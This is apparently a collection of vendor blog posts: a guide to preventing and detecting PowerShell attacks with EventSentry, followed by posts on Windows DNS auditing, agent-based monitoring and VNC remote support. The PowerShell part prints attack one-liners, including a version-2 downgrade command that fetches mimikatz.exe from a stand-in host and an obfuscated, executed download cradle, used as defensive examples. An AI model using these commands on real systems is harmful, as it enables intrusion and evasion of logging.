From PowerShell to p@W3RH311 – Detecting and Preventing PowerShell Attacks

In part one I provided a high level overview of PowerShell and the potential risk it poses to networks. Of course we can only mitigate some PowerShell attacks if we have a trace, so going forward I am assuming that you followed part 1 of this series and enabled

  • Module Logging
  • Script Block Logging
  • Security Process Tracking (4688/4689)

I am dividing this blog post into 3 distinct sections:

  1. Prevention
  2. Detection
  3. Mitigation

We start by attempting to prevent PowerShell attacks in the first place, decreasing the attack surface. Next we want to detect malicious PowerShell activity by monitoring a variety of events produced by PowerShell and Windows (with EventSentry). Finally, we will mitigate and stop attacks in their tracks. EventSentry’s architecture involving agents that monitor logs in real time makes the last part possible.

But before we dive in … the

PowerShell Downgrade Attack

In the previous blog post I explained that PowerShell v2 should be avoided as much as possible since it offers zero logging, and that PowerShell v5.x or higher should ideally be deployed since it provides much better logging. As such, you would probably assume that basic script activity would end up in of the PowerShell event logs if you enabled Module & ScriptBlock logging and have at least PS v4 installed. Well, about that.

So let’s say a particular Windows host looks like this:

  • PowerShell v5.1 installed
  • Module Logging enabled
  • ScriptBlock Logging enabled

Perfect? Possibly, but not necessarily. There is one version of PowerShell that, unfortunately for us, doesn’t log anything useful whatsoever: PowerShell v2. Also unfortunately for us, PowerShell v2 is installed on pretty much every Windows host out there, although only activated (usable) on those hosts where it either shipped with Windows or where the required .NET Framework is installed. Unfortunately for us #3, forcing PowerShell to use version 2 is as easy as adding -version 2 to the command line. So for example, the following line will download some payload and save it as calc.exe without leaving a trace in any of the PowerShell event logs:

powershell -version 2 -nop -NoLogo -Command "(new-object System.Net.WebClient).DownloadFile('http://www.pawnedserver.net/mimikatz.exe', 'calc.exe')"

However, let’s not forget that PowerShell automatically expands command line parameters if there is no conflict with other parameters, so running

powershell -v 2 -nop -NoLogo -Command "(new-object System.Net.WebClient).DownloadFile('http://www.pawnedserver.net/mimikatz.exe', 'calc.exe')"

does the exact same thing. So when doing pattern matching we need to use something like -v* 2 to ensure we can catch this parameter.

Microsoft seems to have recognized that PowerShell is being exploited for malicious purposes, resulting in some of the advanced logging options like ScriptBlockLogging being supported in newer versions of PowerShell / Windows. At the same time, Microsoft also pads itself on the back by stating that PowerShell is – by far –the most securable and security-transparent shell, scripting language, or programming language available. This isn’t necessarily untrue – any scripting language (Perl, Python, …) can be exploited by an attacker just the same and would leave no trace whatsoever. And most interpreters don’t have the type of logging available that PowerShell does. The difference with PowerShell is simply that it’s installed by default on every modern version of Windows. This is any attackers dream – they have a complete toolkit at their fingertips.

So which Operating Systems are at risk?

PowerShell Version 2 Risk
Windows Version
PowerShell V2
Active By Default
PowerShell V2
Removable?
Threat Level
Windows 7 Yes No Vulnerable
Windows 2008 R2 Yes No Vulnerable
Windows 8 & later No Yes Potentially Vulnerable – depends on .NET Framework v2.0
Windows 2012 & later No Yes Potentially Vulnerable – depends on .NET Framework v2.0
Versions of Windows susceptible to Downgrade Attack

OK, so that’s the bad news. The good news is that unless PowerShell v2 was installed by default, it isn’t “activated” unless the .NET Framework 2.0 is installed. And on many systems that is not the case. The bad news is that .NET 2.0 probably will likely be installed on some systems, making this downgrade attack feasible. But another good news is that we can detect & terminate PowerShell v2 instances with EventSentry (especially when 4688 events are enabled) – because PowerShell v2 can’t always be uninstalled (see table above). And since we’re on a roll here – more bad news is that you can install the required .NET Framework with a single command:

dism.exe /online /enable-feature /featurename:NetFX3 /all

Of course one would need administrative privileges to run this command, something that makes this somewhat more difficult. But attacks that bypass UAC exist, so it’s feasible that an attacker accomplishes this if the victim is a local administrator.

According to a detailed (and very informative) report by Symantec, PS v2 downgrade attacks haven’t been observed in the wild (of course that doesn’t necessarily mean that they don’t exist), which I attribute to the fact that most organizations aren’t auditing PowerShell sufficiently, making this extra step for an attacker unnecessary. I do believe that we will start seeing this more, especially with targeted attacks, as organizations become more aware and take steps to secure and audit PowerShell.

1. Prevention

Well, I think you get the hint: PowerShell v2 is bad news, and you’ll want to do one or all of the following:

  • Uninstall PowerShell v2 whenever possible
  • Prevent PowerShell v2 from running (e.g. via AppLocker)
  • Detect and terminate any instances of PowerShell v2

If you so wish, then you can read more about the PowerShell downgrade attack and detailed information on how to configure AppLocker here.

Uninstall PowerShell v2

Even if the .NET Framework 2.0 isn’t installed, there is usually no reason to have PowerShell v2 installed. I say usually because some Microsoft products like Exchange Server 2010 do require it and force all scripts to run against version 2. PowerShell version 2 can manually be uninstalled (Windows 8 & higher, Windows Server 2012 & higher) from Control Panel’s Program & Features or with a single PowerShell command: (why of course – we’re using PowerShell to remove PowerShell!):

Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -norestart

While running this script is slightly better than clicking around in Windows, it doesn’t help much when you want to remove PowerShell v2.0 from dozens or even hundreds of hosts. Since you can run PowerShell remotely as well (something in my gut already tells me this won’t always be used for honorable purposes) we can use Invoke-Command cmdlet to run this statement on a remote host:

Invoke-Command -Computer WKS1 -ScriptBlock { Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -norestart }

Just replace WKS1 with the host name from which you want to remove PowerShell v2 and you’re good to go. You can even specify multiple host names separated by a comma if you want to run this command simultaneously against multiple hosts, for example

Invoke-Command -Computer WKS1,WKS2,WKS3 -ScriptBlock { Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -norestart }

Well congratulations, at this point you’ve hopefully accomplished the following:

  • Enabled ModuleLogging and ScriptBlockLogging enterprise-wide
  • Identified all hosts running PowerShell v2 (you can use EventSentry’s inventory feature to see which PowerShell versions are running on which hosts in a few seconds)
  • Uninstalled PowerShell v2 from all hosts where supported and where it doesn’t break critical software

Terminate PowerShell v2

Surgical Termination using 4688 events

If you cannot uninstall PowerShell v2.0, don’t have access to AppLocker or want to find an easier way than AppLocker then you can also use EventSentry to terminate any powershell.exe process if we detect that PowerShell v2.0 was invoked with the -version 2 command line argument. We do this by creating a filter that looks for 4688 powershell.exe events that include the -version 2 argument and then link that filter to an action that terminates that PID.

Filter & Action to terminate PS v2.0
Filter & Action to terminate PS v2.0

If an attacker tries to launch his malicious PowerShell payload using the PS v2.0 engine, then EventSentry will almost immediately terminate that powershell.exe process. There will be a small lag between the time the 4688 event is logged and when EventSentry sees & analyzes the event, so it’s theoretically possible that part of a script will begin executing. In all of the tests I have performed however, even a simple “Write-Host Test” PowerShell command wasn’t able to execute properly because the powershell.exe process was terminated before it could run. This is likely because the PowerShell engine does need a few milliseconds to initialize (after the 4688 event is logged), enough time for EventSentry to terminate the process. As such, any malicious script that downloads content from the Internet will almost certainly terminated in time before it can do any harm.

Shotgun Approach

The above approach won’t prevent all instances of PowerShell v2.0 from running however, for example when the PowerShell v2.0 prompt is invoked through a shortcut. In order to prevent those instances of PowerShell from running we’ll need to watch out for Windows PowerShell event id 400, which is logged anytime PowerShell is launched. This event tells us which version of PowerShell was just launch via the EngineVersion field, e.g. it will include EngineVersion=2.0 when PowerShell v2.0 is launched. We can look for this text and link it to a Service action (which can also be used to terminate processes).

Filter & Action to terminate all powershell instances
Terminate all powershell instances

Note: Since there is no way to correlate a Windows PowerShell event 400 with an active process (the 400 event doesn’t include a PID), we cannot just selectively kill version 2 powershell.exe processes. As such, when a PowerShell version instance is detected, all powershell.exe processes are terminated, version 5 instances. I personally don’t expect this to be a problem, since PowerShell processes usually only run for short periods of time, making it unlikely that a PowerShell v5 process is active while a PowerShell v2.0 process is (maliciously) being launched. But decide for yourself whether this is a practicable approach in your environment.

2. Detection

Command Line Parameters

Moving on to detection, where our objective is to detect potentially malicious uses of PowerShell. Due to the wide variety of abuse possibilities with PowerShell it’s somewhat difficult to detect every suspicious invocation of PowerShell, but there are a number of command line parameters that should almost always raise a red flag. In fact, I would recommend alerting or even terminating all powershell instances which include the following command line parameters:

Highly Suspicious PowerShell Parameters
Parameter
Variations
Purpose
-noprofile -nop Skip loading profile.ps1 and thus avoiding logging
-encoded -e Let a user run encoded PowerShell code
-ExecutionPolicy bypass -ep bypass, -exp bypass, -exec bypass Bypass any execution policy in place, may generate false positives
-windowStyle hidden Prevents the creation of a window, may generate false positives
-version 2 -v 2, -version 2.0 Forces PowerShell version 2
Any invocation of PowerShell that includes the above commands is highly suspicious

The advantage of analyzing command line parameters is that it doesn’t have to rely on PowerShell logging since we can evaluate the command line parameter of 4688 security events. EventSentry v3.4.1.34 and later can retrieve the command line of a process even when it’s not included in the 4688 event (if the process is active long enough). There is a risk of false positives with these parameters, especially the “windowStyle” option that is used by some Microsoft management scripts.

Modules

In addition to evaluating command line parameters we’ll also want to look out for modules that are predominantly used in attacks, such as .Download, .DownloadFile, Net.WebClient or DownloadString. This is a much longer list and will need to be updated on a regular basis as new toolkits and PowerShell functions are being made available.

Depening on the attack variant, module names can be monitored via security event 4688 or through PowerShell’s enhanced module logging (hence the importance of suppressing PowerShell v2.0!), like event 4103. Again, you will most likely get some false positives and have to setup a handful of exclusions.

Command / Code Obfuscation

But looking at the command line and module names still isn’t enough, since it’s possible to obfuscate PowerShell commands using the backtick character. For example, the command.

(New-Object Net.WebClient).DownloadString('https://bit.ly/L3g1t')

could easily be detected by looking for with a *Net.WebClient*, *DownloadString* or the *https* pattern. Curiously enough, this command can also be written in the following way:

Invoke-Expression (New-Object Net.Web`C`l`i`ent)."`D`o`wnloadString"('h'+'t'+'t'+'ps://bit.ly/L3g1t')

This means that just looking for DownloadString or Net.WebClient is not sufficient, and Daniel Bohannon devoted an entire presentation on PowerShell obfuscation that’s available here. Thankfully we can still detect tricks like this with regex patterns that look for a high number of single quotes and/or back tick characters. An example RegEx expression to detect 2 or more back ticks for EventSentry will look like this:

^.*CommandLine=.*([^`]*`){2,}[^`]*.*$

The above expression can be used in PowerShell Event ID 800 events, and will trigger every time a command which involves 2 or more back ticks is executed. To customize the trigger count, simply change the number 2 to something lower or higher. And of course you can look for characters other than the ` character as well, you can just substitute those in the above RegEx as well. Note that the character we look for appears three (3) times in the RegEx, so it will have to be substituted 3 times.

To make things easier for EventSentry users, EventSentry now offers a PowerShell event log package which you can download via the Packages -> Download feature. The package contains filters which will detect suspicious command line parameters (e.g. “-nop”), detect an excessive use of characters used for obfuscation (and likely not used in regular scripts) and also find the most common function names from public attack toolkits.

Evasion

It’s still possible to avoid detection rules that focus on powershell.exe if the attacker manages to execute PowerShell code through a binary other than powershell.exe, because powershell.exe is essentially just the “default vehicle” that facilitates the execution of PowerShell code. The NPS (NotPowerShell) project is a good example and executes PS code through a binary named nps.exe (or whatever the attacker wants to call lit), but there are others. While the thought of running PowerShell code through any binary seems a bit concerning from a defenders perspective, it’s important to point out that downloading another binary negates the advantage of PowerShell being installed by default. I would only expect to see this technique in sophisticated, targeted attacks that possibly start the attack utilizing the built-in PowerShell, but then download a stealth app for all subsequent activity.

This attack can still be detected if we can determine that one of the following key DLLs from the Windows management framework are being loaded by a process other than powershell.exe:

  1. System.Management.Automation.Dll
  2. System.Management.Automation.ni.Dll
  3. System.Reflection.Dll

You can detect this with Sysmon, something I will cover in a follow-up article.

3. Mitigation

EventSentry PowerShell Rules
EventSentry PowerShell Rules

Now, having traces of all PowerShell activity when doing forensic investigations is all well and good, and detecting malicious PowerShell activity after it happened is a step in the right direction. But if we can ascertain which commands are malicious, then why not stop & prevent the attack before it spreads and causes damage?

In addition to the obvious action of sending all logs to a central location, there are few things we can do in response to potentially harmful activity:

1. Send out an alert
2. Mark the event to require acknowledgment
3. Attempt to kill the process outright (the nuclear option)
4. A combination of the above

If the only source of the alert is from one of the PowerShell event logs then killing the exact offending PowerShell process is not possible, and all running powershell.exe processes have to be terminated. If we can identify the malicious command from a 4688 event however, then we can perform a surgical strike and terminate only the offending powershell.exe process – other potentially (presumably benign) powershell.exe processes will remain unharmed and can continue to do whatever they were supposed to do.

If you’re unsure as to how many PowerShell scripts are running on your network (and not knowing this is not embarrassing – many Microsoft products run PowerShell scripts on a regular basis in the background) then I recommend just sending email alerts initially (say for a week) and observe the generated alerts. If you don’t get any alerts or no legitimate PowerShell processes are identified then it should be safe to link the filters to a “Terminate PowerShell” action as shown in the screenshots above.

Testing

After downloading and deploying the PowerShell package I recommend executing a couple of offending PowerShell commands to ensure that EventSentry will detect them and either send out an alert or terminate the process (or both – depending on your level of conviction). The following commands should be alerted on and/or blocked:

powershell.exe -nop Write-Host AlertMe

powershell.exe (New-Object Net.WebClient).DownloadString('https://bit.ly/L3g1t')

powershell.exe `Wr`it`e-`H`ost AlertMeAgain

False Alerts & Noise

Any detection rules you setup, whether with EventSentry or another product, will almost certainly result in false alerts – the amount of which will depend on your environment. Don’t let this dissuade you – simply identify the hosts which are “incompatible” with the detection rules and exclude either specific commands or exclude hosts from these specific rules. It’s better to monitor 98 out of 100 hosts than not monitor any host at all.

With EventSentry you have some flexibility when it comes to excluding rules from one or more hosts:

Conclusion

PowerShell is a popular attack vector on Windows-based systems since it’s installed by default on all recent versions of Windows. Windows admins need to be aware of this threat and take the appropriate steps to detect and mitigate potential attacks:

  1. Disable or remove legacy versions of PowerShell (=PowerShell v2)
  2. Enable auditing for both PowerShell and Process Creation
  3. Collect logs as well as detect (and ideally prevent) suspicious activity

EventSentry users have an excellent vantage point since its agent-based architecture can not only detect malicious activity in real time, but also prevent it. The PowerShell Security event log package, which can be downloaded from the management console, offers a list of rules that can detect many PowerShell-based attacks.

Auditing DNS Server Changes on Windows 2008/2008R2/2012 with EventSentry

In part one of this blog series we showed how to monitor DNS audit logs in Windows 2012 R2 and higher with EventSentry.

Before I continue I need to point out that DNS auditing has become significantly easier starting with Windows 2012 R2. Not only is it enabled by default, but the generated audit data is also much more granular and easier to interpret. The logged events even distinguish between regular and dynamic updates, making it easy to filter out noise. So if you’re serious about DNS auditing and have the option to update then I recommend you do so.

If you’re running Windows 2008 (R2) or 2012 then setting up DNS auditing requires a few steps. Thankfully it’s a one-time process and shouldn’t take more than a few minutes. On the EventSentry side a pre-built package with all the necessary rules is available for download and included with the latest installer.

Please follow the steps outlined below exactly as described, auditing won’t work or will be incomplete if these steps aren’t followed exactly as described below.

Enabling Directory Service Auditing

Enabling Sub Category Auditing

We first need to make sure that the new subcategory-based audit settings are enabled in group policy. If you’ve already done that, then you can skip this step and jump to “ADSIEdit”.

Since most of the steps here involve domain controllers, I recommend that you make the changes in a group policy, e.g. in the “Default Domain Controller” policy. In Group Policy Management, find an existing group policy, or create a new one, and set Computer Configuration\Polices\Windows Settings\Security Settings\Local Polices\Security Options\Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings to Enabled.

Then, navigate to Computer Configuration\Polices\Windows Settings\Advanced Audit Policy Configuration\Audit Policies\DS Access and set Audit Directory Service Changes to Success.

ADSI Edit

Open ADSI Edit via Start -> Run -> “adsiedit.msc”. If your default naming context does not automatically appear OR if the listed naming context does not include dc=domaindnszones, then select “Action -> Connect To” and connect to the appropriate naming context, e.g.

dc=domaindnszones,dc=yourdomain,dc=com

Replace the dc components after “domaindnszones” with the actual DNS name of your domain. It’s important that “dc=domaindnszones” is part of the naming context.

Once connected, expand the naming context and locate the “CN=MicrosoftDNS” container, right-click it, and select Properties. Then select Security, Advanced, Auditing and click on Add. In the resulting dialog we’ll audit the built-in “Everyone” user so that DNS changes from everyone are audited:

Name (Principal): Everyone
Apply onto:       This object and all descendent objects
Access:           Create dnsZone objects

 

Enabling auditing with ADSI Edit (1)

It may seem tempting to also check the “Delete dnsZone objects”, but resist the temptation. Don’t be fooled by the term “dnsZone”, the ACE entry we just added will audit the creation of all AD DNS objects (and not just DNS zones) and log event 5136 to the security event log. In order to audit deletions as well, click “Add” again but this time configure the dialog as shown below:

Name (Principal): Everyone
Apply onto:       Descendent dnsZone objects
Access:           Delete
Enabling auditing with ADSI Edit (2)

It’s important that the “Apply onto” is changed to Descendent dnsZone objects. This ACE entry will result in event 5141 being logged when a DNS-related directory service object is deleted. This is were things get a bit interesting though, since DNS records deleted from the DNS manager aren’t actually deleted. Instead, they are tombstoned (which is done internally by adding the dNSTombstoned attribute to the object). Only when the tombstoned object expires is it actually deleted. You can use ADSIEdit if you want to send a DNS object immediately to heaven and skip the graveyard stage.

Unlike Windows 2012 R2 and later, earlier versions of Windows are a little more verbose than you probably like when it comes to directory service auditing. For example, creating a new DNS A record in a zone will result in 4 different events with id 5136 being logged – and not just one. The events logged when adding or deleting a zone or A record are shown in the diagram below:

Directory Service Changes events

All events are logged under the “Directory Service Changes” category.

Testing

Before we start configuring EventSentry, we’ll want to make sure that auditing was setup correctly. On a domain controller, open the “DNS” application and either temporarily add a new A record or primary zone. You should either see a 5136 or 5137 events with the category “Directory Service Changes” logged to the security event log.

If you don’t see the events then walk through the above steps again, or reference this Microsoft article.

Configuring EventSentry

There are generally two things one will want to do with these audit events – store them in a database, email them or both. If you’re already consolidating Audit Success events in an EventSentry database then you shouldn’t have to do anything, all directory service change events will be written to the database automagically.

Database

If you only want to store directory service change events in the database (opposed to storing all audit success events), then you can simply create an include filter with the following properties:

Log:      Security
Severity: Audit Success
Source:   Microsoft-Windows-Security-Auditing
Category: Directory Service Changes

… and assign your database action to it.

Alerts

Setting up alerts using filters for when zones or records are added or removed is a little more involved than one would hope, thanks to Windows logging more than one event whenever such a change is done – as is depicted in the image above. For example, creating a new DNS record will result in 4 x 5136 events being logged, deleting will result in 3 events.

Lucky for you, we’ve analyzed the events and created a DNS Server Auditing package in EventSentry which will email you a single alert (=event) whenever a record or zone are added or removed. This package is included with all new installation of EventSentry, existing users running 3.4 or later can get it through the package update feature in the management console.

DNS Server Auditing Package
DNS Server Auditing Package

And that’s really all there is to it … if you have EventSentry installed then setting up auditing in Windows is really the only obstacle to auditing your DNS records!

Agent vs Agentless: Why you should monitor (event) logs with an agent-based log monitoring solution

The debate as to whether agent-based or agent-less monitoring is “better” has been answered many times over the years in magazine / online articles, blog posts, vendor white papers and others. Unfortunately, most of these articles are often incomplete, inaccurate, biased, or a combination thereof.

To make things slightly more confusing, different ISV use different methods for monitoring servers and workstations. Some use agents, some don’t, and a small few offer both both methods. But what is ultimately the best method?

What are you monitoring?

First it’s important determine what is being monitored to determine whether an agent-based or agent-less approach is better. For example, collecting system metrics like performance data usually creates fewer challenges then transmitting large amounts of (event) log data. Furthermore, agent-based monitoring is not an option for devices which run a proprietary embedded OS (think switch, printer, …) where you can’t install an agent in the first place.

Consequently I’ll be focusing on monitoring (event) logs with an emphasis on Microsoft Windows in this post. Having developed both agent-based as well as agent-less components in C++ over the years I feel that I am in a good position to objectively compare agent-based with agent-less approaches.

The Myths

Monitoring software is of course not the only type of software that uses agents, a lot of other enterprise software (backup, deployment, A/V …) uses agents as well. Below are some of the myths as to what (monitoring) using agents entails:

  • Agents may use up too many resources on the monitored hosts and slow down the monitored machines
  • Agents can become unstable and negatively affect the host OS
  • Deploying and managing agents is tedious and time-consuming
  • Installing agents may require the installation & deployment of dependencies the agents need (.NET, Java, …)
  • Installing third-party software will decrease the security of the monitored host

The Reality

It’s understandable that software which is installed on potentially every server and workstation in a network undergoes some level of scrutiny, but would you be surprised to learn that agents excel in the following areas:

1. Security: Better security since agents push data to a central component, instead of the monitored server being configured to allow remote collection.
2. Reliability: Agents can temporarily store and cache monitored logs if connectivity to the central monitoring server is lost, even if local logs are no longer available. Agents can also take corrective actions more quickly because they can work in isolation (offline). Mobile devices cannot be monitored with agent-less solutions since they cannot be reached by the central monitoring component.
3. Performance: Agents can apply local filtering rules and only transmit data which is valuable, thus increasing throughput while decreasing network utilization.
4. Functionality: They offer more capabilities since there are essentially no limits as to what type of information can be gathered by an agent since it has full access to the monitored system.

The Easy Way Out

Developing agents along with an easy-to-use deployment mechanism requires a lot of time and resources, so it doesn’t come as a surprise to learn that many vendors prefer to monitor hosts without agents. To compensate for the short-fall, ISV which solely have to rely on an agent-less approach will do their best to:

  • Emphasize that they do not use agents
  • Persuade you that agent-less monitoring is preferable

The irony, when promoting a solution as agent-less, is that even so-called agent-less solutions do in fact utilize and agent – the only difference being that the agent is (usually) integrated into Windows. Windows doesn’t just magically service remote clients asking for a boatload of WMI data – it processes these requests through the WMI service, which, for all intents and purposes, is an agent. For example, accessing the Windows event logs via WMI traverses significantly more layers than accessing the event logs directly.

Conclusion

With the exception of network devices where an agent cannot be installed, agent-based solutions will provide a more thorough monitoring experience 9 out of 10 times – assuming that the agent meets all the checklist requirements below.

Some event log monitoring vendors will try to convince you that agent-less monitoring is better & easier (easier for whom?) – but don’t fall for it. We’ve been tweaking and improving the EventSentry agent for more than 10 years, and as a result EventSentry offers one of the most advanced and efficient Windows agents for log monitoring on the market. Developing a rock-solid, secure and fast agent is hard, but it’s the only sensible approach which doesn’t cut corners.

There are situations when deploying a full-scale monitoring solution with agents is not possible, for example when you are tasked with monitoring a third-party network where installing any software is not an option. While unfortunate, an agent-less monitoring solution can fill the gap in this case.

EventSentry also utilizes SNMP (agent-less) to gather inventory, performance metrics as well as other system data from non-Windows devices, including Linux hosts. This collection method does suffer from the above limitations, but since log data is pushed from Non-Windows devices via the Syslog protocol, it’s an acceptable compromise.

Don’t compromise when it comes to monitoring the (event) logs of your Windows infrastructure and select an architecture which scales and offers security & performance.

Technical Comparison

The table below examines the difference between agent-based and agent-less solutions in greater detail.

Resource Utilization & Performance
Agent-Based
Agent-Less
Verdict
  • Usually higher throughput since agents can analyze, filter and evaluate log entries before sending them across the network.
  • Local resource utilization depends on the implementation of the agent.
  • Agent can access (event) logs directly via efficient API access.
  • Network utilization is likely much higher since more logs have to be transmitted across the network before being evaluated. Local filtering capabilities are limited and depend on the protocol (usually WMI).
  • Network latency and utilization affect performance of monitoring solution. Network utilization cannot be controlled.
  • Accessing (event) log data remotely through WMI is much less efficient.
  • Over-saturation of central monitoring component can negatively affect monitoring of entire infrastructure.
Higher network utilization combined with the fact that remote log collection will still utilize CPU cycles on the remote host (e.g. through WMI provider) favors agent-based solutions.
Agent-less solutions have a single point of failure, while agents can filter & evaluate data locally before transmitting them to a central database.
EventSentry Agents are designed to be essentially invisible under normal operations and do not impact the host system negatively in any way.
Stability & Reliability
Agent-Based
Agent-Less
Verdict
  • Failure of an agent does not affect monitoring of other hosts.
  • Locally collected data can be cached if central monitoring component is temporarily unavailable.
  • Failure of a central component may negatively affect deployed agents if they rely on the central component and cannot cache data.
  • Failure of central monitoring system will affect and potentially disable monitoring of all hosts.
  • Hosts which lose network connectivity (e.g. laptops) cannot be monitored while unreachable.
Agent-based solutions have an advantage since local data can be cached and corrective actions can be executed even when the central monitoring component is unavailable. Cache data & logs are re-transmitted – even if the local logs have been cleared or overwritten.
Agent-based solutions can monitor hosts even when disconnected from LAN.
The EventSentry Agent auto-recovers if the process aborts unexpectedly, and by default alerts the user when this occurs. When using the collector (default), the agent caches all data locally and retransmits when the network connection becomes available again.
Deployment
Agent-Based
Agent-Less
Verdict
  • Has to be deployed either with vendor management software and/or with third-party deployment software if vendor provides installation package (e.g. MSI).
  • Larger deployments will require multiple central monitoring components, potentially distributed over several LANs.
  • Only hosts in local LAN can be monitored.
Depends on deployment tools made available by vendor as well as management tools in place for configuring Windows settings. A poorly developed deployment tool would favor an agent-less solution.
EventSentry Agents can be deployed (multi-threaded) with the management console or through 3rd party deployment software by creating a MSI installer on the fly. When using the collector (default), agent updates (patches) can be deployed automatically.
Dependencies
Agent-Based
Agent-Less
Verdict
  • Agent may have dependencies on third-party frameworks
  • Depends on whether the mechanism utilized by the monitoring software requires a Windows component to be added and/or configured.
Depends on whether agent has dependencies and whether configuration changes need to be made on the monitored hosts.
The EventSentry Agent does not depend on any 3rd party frameworks or libraries.
Security
Agent-Based
Agent-Less
Verdict
  • Potential security issues if installed agent exposes itself to the network (if not firewalled) and/or suffers from local vulnerabilities which can be exploited.
  • Remote log collection has to be enabled and at least the central monitoring component needs to have remote access.
  • Secure data transmission relies on protocols and settings from Windows.
  • Enabling multiple methods for gathering data remotely (e.g. WMI) provides additional attack vectors.
  • Credentials (usually Windows user/password) for remote systems must be stored in a central location so that the remote hosts can be queried. If the central system gets compromised, critical credentials can be exploited.
Since agent-based solutions do not require permanent remote access and monitored hosts can therefore be hardened more, they are inherently more secure IF the agent doesn’t suffer from an insecure design and/or vulnerabilities.
Agent-based solutions also have more control over how data is transmitted from the remote hosts.
If there is general concern against third-party software then the product in question should be researched in a vulnerability database like http://www.cvedetails.com.
The EventSentry Agent does not open any ports on a monitored host and resides in a secured location on disk. The agent transmits compressed data securely via TLS to the collector. No major security vulnerabilities have been discovered in the EventSentry agent since its first release in 2002.
Scope & Functionality
Agent-Based
Agent-Less
Verdict
  • Agents have full access to the monitored system and can choose which technology to utilize to get the required data (API, WMI, registry, …)
  • Easily execute local corrective action like launching a script or process
  • Agent-less solutions are limited to remote APIs provided by the monitored host, most commonly WMI. While WMI does offer a lot of functionality, there are limitations.
  • Executing scripts on remote host is more involved and only possible when host is reachable.
Agent-based solutions have an advantage since they can utilize multiple technologies to obtain data, including highly efficient direct API access. Agents can also trigger (corrective) actions locally even while the agent is unreachable.
Agent-less solutions can only monitor data which is made available by the remote protocol.
The EventSentry Agent accesses log files, event logs and other system health data almost exclusively via direct API calls. The more resource-intensive WMI interface is only used minimally, for very specific purposes. Corrective action can be taken directly on the monitored host, often only in milliseconds after an error condition (event) has occurred.

 

Appendix: Checklist

When evaluating software that offers agents then you can utilize the check list below for evaluation purposes.

Resource Utilization
An agent needs to consume as little resources as possible under normal operations. With the exception of short (and unusual) peak periods, a user should never know that an agent is running on their server or workstation – period.
The thought of having a resource-hogging agent running on a server sends shivers down the backs of many SysAdmins, and the agents used by certain AntiVirus vendors that rhyme with Taffy didn’t set a good precedent.
Stability & Reliability
The agent needs to run at all times without crashing – the SysAdmin needs to be able to go to sleep knowing that his agents will reliably monitor all servers and workstations. Unstable agents are just no fun, especially when they negatively impact the host OS.
If an agent that encounters an issue, it needs to at least auto-recover and communicate the issue to the admin.
Deployment
Agent deployment and management needs to be streamlined and easy – it shouldn’t be a burden on the end user. And while agent deployment is important, agent management, keeping the remote agent up-to-date, is equally important and should – ideally – be handled automatically.
Most SysAdmins have enough work the way it is, the last thing they need is baby-sitting agents of their monitoring solution.
Dependencies
The more dependencies an agent has, the more difficult it is to deploy the agent. Agents that rely on complex frameworks like .NET, Java or specific Visual Studio runtimes are difficult and time-consuming to deploy.
Furthermore, any third-party software that is installed as a dependency creates an additional attack vector and needs to then be kept up-to-date.
Security
An agent needs to be 100% secure and cannot expose the monitored host to any additional security risks. I will explain below why using agents is actually more secure than not using an agent – even though this seems counter-intuitive at first glance.

Remote Support with VNC – The Easy & Secure Way!

Almost everyone in IT has heard of VNC – which actually stands for “Virtual Network Computing”. The RFB (Remote Framebuffer) protocol which VNC relies on, was developed around 1998 by Olivetti & Oracle Research Labs. Olivetti (unlike Oracle) isn’t much known outside of Italy/Europe, and the ORL was ultimately closed in 2002 after being acquired by AT&T. But enough of the history.

When the need arises to remotely log into a (Windows) host on the network, Microsoft’s Remote Desktop application (which utilizes Microsoft’s RDP protocol – not RFB) is usually the default choice. And why wouldn’t it be? It’s built into Windows, there is no additional cost, and it’s usually quite efficient (=fast) – even over slower connections.

Remote Desktop has a few disadvantages though, especially when it comes to the IT help desk:

  • You cannot view the remote user’s current desktop
  • It’s not cross-platform
  • You can’t use RDP if it’s disabled or misconfigured

Especially when troubleshooting user problems, being able to see exactly what the user is doing is obviously very beneficial. VNC-based applications are a good alternative since they allow you to view the user’s desktop and subsequently interact with the user. This makes VNC viable for help desk as well as troubleshooting. Nevertheless, VNC-based solutions have their own shortcomings:

  • Free variations of VNC usually offer no deployment assistance
  • With over 10 variants available, finding the best VNC implementation is a daunting task
  • VNC is still deemed as somewhat insecure
  • VNC can be slow

We set out to solve these shortcomings by creating a number of scripts around UltraVNC that integrate with the EventSentry management console (although they’ll work well without EventSentry as well!). Using the QuickTools feature, you can then connect to a remote host via VNC with 2 clicks, even if the remote host doesn’t have VNC installed.

Important: The scripts only work in environments where you have administrative access to the remote hosts. The scripts need to copy files to the remote host’s administrative shares and control the remote VNC service.

Alternatively, you will also be able to start a VNC session by running the following command:

vnc_start.bat remotehost.yourdomain.com

Even better, VNC can be automatically stopped and deactivated (until vnc_start.bat is run again) once the session is completed in order to reduce the attack surface.

VNC Deployment
As long as you have administrative access to the remote host(s), the script will remotely install VNC and even setup a firewall exclusion rule if necessary – although the UltraVNC installer takes care of this out of the box.

Security
To reduce the attack surface of machines running VNC you can automatically stop the VNC service after you have disconnected from the remote host. Our connection script will automatically start the remote service again when you connect the next time.

For the utmost security you can also completely uninstall VNC when you are done, a script (vnc_uninstall.bat) is included for this purpose.

Speed
Even though VNC is generally not as fast as RDP, it’s usually sufficiently fast in LAN environments (especially for shorter trouble-shooting sessions) and the UltraVNC port which we’ll be covering in this post performs reasonably well even over slower WAN connections.

Integration with EventSentry
Monitoring workstations with EventSentry strengthens the capabilities of any IT helpdesk and IT support team with:

  • Software & Hardware Inventory
  • Access to process utilization and log consolidation
  • Enhanced security with security log & service monitoring
  • User console logon tracking
  • Pro-active troubleshooting with access to performance and other system health metrics

Remote desktop sharing is an additional benefit with the UltraVNC package which is included with the latest version of EventSentry (v3.3.1.42). Customizing the scripts and integrating them with EventSentry literally shouldn’t take more than 5 minutes, and once setup & configured will allow you to remotely control any monitored host with a couple of clicks. The scripts do not require EventSentry, but are included with the setup and integrate seamlessly into the EventSentry Management Console.

The EventSentry Management Console includes the “QuickTools” feature which allows you to link up to 8 commands to the context menu of a computer item. EventSentry ships with a few default QuickTools commands, for example to reboot a remote machine. Once configured, you simply right-click a computer icon in the EventSentry Management console and select one of the pre-configured applications from the QuickTools sub menu.

EventSentry QuickTools
EventSentry QuickTools

How does it work?
